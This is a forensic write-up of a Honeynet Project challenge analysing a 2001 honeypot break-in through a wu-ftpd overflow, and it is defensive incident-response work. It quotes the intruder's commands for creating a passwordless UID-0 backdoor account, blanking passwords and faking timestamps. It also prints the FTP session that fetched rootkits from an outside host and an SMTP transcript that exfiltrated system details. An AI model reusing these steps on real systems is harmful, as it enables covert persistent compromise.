Scan 19 Analysis

by Iftach Amit


The Challenge:

On September 16th a Redhat Linux 6.2 honeypot was compromised. This is the 3rd time this system was compromised by the same intruder. The honeynet is VMware based and uses a modified bash to log to syslog. Syslog is remotly logging to 0.0.0.0 (remote syslog server IP has been replaced). The compromised system has an IP of 192.168.1.102. After successfully breaking into the box, the attacker ended up using 3 modes of connecting and running commands (some of which is encrypted). The attacker also tried to hide some of his edits from the MAC times. Downloads:
scan19.tar.gz, MD5 =11e0be295d138df14111796a7733a5d2
scan19.zip, MD5 = c065797b3c2ddfad3396e3d4542ed8a7

1. Which vulnerability did the intruder exploit?
2. What ways, and in what order, did the intruder use to connect and run commands on the system?
3. How did the intruder try to hide his edits from the MAC times?
4. The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?
5. Recover (tell how you did it too) the rootkits from the snort binary capture
6. What does the rootkit do to hide the presence of the attacker on the system?
7. What did you learn from this exercise?
8. How long did this challenge take you?

Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.


The analysis:


First I downloaded the snort log files using wget (a unix utility to retrieve internet content):

$wget http://project.honeynet.org/scans/scan19/scan19.tar.gz
$md5sum scan19.tar.gz
11e0be295d138df14111796a7733a5d2  scan19.tar.gz
$mkdir scan19; cd scan19; tar xzf ../scan19.tar.gz

After downloading the logs, verifying the integrity of the archive and extracting the log files, we start to examine the findings.
This time I will use Ettercap to examine the logs (just to make a differenceà), so we fire up ethereal, load in the log files (remembering to disable name resolution ;) and haul away.

The first thing on the newdat3.log at Sep. 16 on approximately 5am is a scan (coming from 210.114.220.46) of the machines 111 port (portmapper) over TCP/IP, which is followed by an RPC portmapper ôGETPORTö request for the ôSTATö service (over UDP of course), which is followed by the reply that the STAT service is indeed running and on the 919 port (UDP).

1. Which vulnerability did the intruder exploit?

Following this is the exploit for the STAT service which obviously is the "standard" buffer overflow which has apparently went unsuccessfully.

After that, no significant traffic towards the server until Sep. 17 at around 1am which consisted of a telnet session coming from 217.156.93.166 and consisted of login attempts under the nobody and uucp accounts which have both failed. Following a few attempt to connect to port 24 and 6666 (known Trojan likely port).

Eventually at 1:55am, the attacker connected from 207.35.251.172 to the ftp service (declared to be a wu-ftp 2.6.0) and logged in as the user ftp (anonymous). He then used the wu-ftp EXEC buffer overflow to force the ftp service to break down and eventually grand a shell access (over the ftp control connection).

2. What ways, and in what order, did the intruder use to connect and run commands on the system?

First he used the ftp control connection he buffer overflowed. Then he used telnet to login and install the rootkits. And finally, ssh for the last and final session.
The intruder then used his "shell over ftp" to run commands on the system and after verifying his identity ("id" answered by uid=0, gid=0 etc...) and users on the system ("w" which resulted in no users...), the attacker spent a few minutes browsing the filesystem, after which he started making his return more easy when he has deleted the nobody user's password (passwd nobody -d).

3. How did the intruder try to hide his edits from the MAC times?

After which, he decided to try and masquerade the changes made to /etc/passwd and the /etc directory by using "touch" to copy the timestamps and modification time of the above to temporary files (at /etc/X11/applnk/Internet/.etcpasswd and /etc/X11/applnk/Internet/.etc). The only problem is that he have performed the timestamp copying AFTER he altered the files once, so this action will be futile.
He creates a new user called "dns" with shell access and a home directory at /bin and has a userid and groupid of root:

/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash

and emptying his password as well:

passwd dns -d

after which he restored the timestamps that he saved earlier from the temporary files.
Finally he examines his work in /etc/passwd and exits at 2:26am.

The attacker then logs in using the telnet service this time and trying the newly password deleted nobody account. He logs in at 2:32am and immediately performs an "su" to dns (without password of course...).
He then creates a directory /dev/rd/sdc0 and operates inside it to cover tracks.

4. The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?

He download a file (rootkit) Zer0.tar.gz from teleport.go.ro after authenticating as "teleport" with a password of "gunoierul". He then downloaded two more files: copy.tar.gz, and ooty.tar.gz.

Then he extracted the Zer0.tar.gz file, cd'd into the Zero dir and executed the rootkit's install script "Go". The rootkits seem to be an old rootkit with modifications (language is Romanian and some words in german)

5. Recover (tell how you did it too) the rootkits from the snort binary capture

The files were extracted from the snort logs by selecting an ftp DATA connection corresponding to the appropriate file (can be identified by the RETR ftp control command just before it. Then selecting "Follow TCP stream", and saving the output to a file.

6. What does the rootkit do to hide the presence of the attacker on the system?

It deleted lines from the syslog configured log files (and detected the remote logging... guess how the attacker looked like when he saw this...). The log cleaning procedure was run three times (probably until no lines needed to be removed...)
The final access (as mentioned before) has been done using ssh to connect to the server (after installing the backdoor in the ssh daemon of course...), during which the attacker cleaned some of the files he downloaded.

7. What did you learn from this exercise?

Remote logging is too valuable to be neglected. The attacker must have had some time looking at the message that he better have access to the remote logging host...

8. How long did this challenge take you?

Approximately 4-5 hours including the write-up.

Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.

Dear ____

I would like to inform you that someone from your network has abused his right for internet connection, and have performed illegal actions against a server in our network.
He has installed Trojans and abused the system.
Much evidence has been gathered that supports that (as you can see below).

We urge you to promptly take care of the person/s responsible for these actions.

Transcripts from the attacker session:

ftp teleport.go.ro

Connected to teleport.go.ro.
220-
220-
220-                           H O M E  .  R  O
220-
220-                 This server is for HOME.RO members only.
220-                  Go to http://www.home.ro/ to register.
220-
220-                      No anonymous access allowed.
220-
220-
220 ProFTPD 1.2.2rc3 Server (HOME.RO Members FTP) [193.231.236.42]
Name (teleport.go.ro:nobody): teleport

331 Password required for teleport.
Password:gunoierul

230 User teleport logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd new

250 CWD command successful.
ftp> get Zer0.tar.gz

local: Zer0.tar.gz remote: Zer0.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for Zer0.tar.gz (139711 bytes).
226 Transfer complete.
139711 bytes received in 7.76 secs (18 Kbytes/sec)
ftp> get copy.tar.gz

local: copy.tar.gz remote: copy.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for copy.tar.gz (265189 bytes).
226 Transfer complete.
265189 bytes received in 14.6 secs (18 Kbytes/sec)
ftp> get ooty.tar.gz

local: ooty.tar.gz remote: ooty.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for ooty.tar.gz (14847 bytes).
226 Transfer complete.
14847 bytes received in 0.856 secs (17 Kbytes/sec)
ftp> bye

221 Goodbye.


And an SMTP message sent to the attacker's free webmail:

220-HotMail (NO UCE) ESMTP server ready at Sun, 16 Sep 2001 17:46:55 -0700 
220 ESMTP spoken here
EHLO localhost.localdomain
250-hotmail.com Hello
250-8bitmime
250 SIZE 1572864
MAIL From:< root@localhost.localdomain> SIZE=2794
250 Requested mail action okay, completed
RCPT To:< hatcheryhatched@hotmail.com>
250 Requested mail action okay, completed
DATA
354 Start mail input; end with < CRLF>.< CRLF>
Received: (from root@localhost)
	by localhost.localdomain (8.9.3/8.9.3) id FAA08755;
	Sun, 16 Sep 2001 05:01:57 -0400
Date: Sun, 16 Sep 2001 05:01:57 -0400
From: root < root@localhost.localdomain>
MIME-Version: 1.0
To: hatcheryhatched@hotmail.com
Subject: ns1
Message-ID: < 0_8752_1000630917_1@ns1>
Content-ID: < 0_8752_1000630917_2@ns1>
Content-type: text/richtext
Content-Transfer-Encoding: quoted-printable

[system information here...]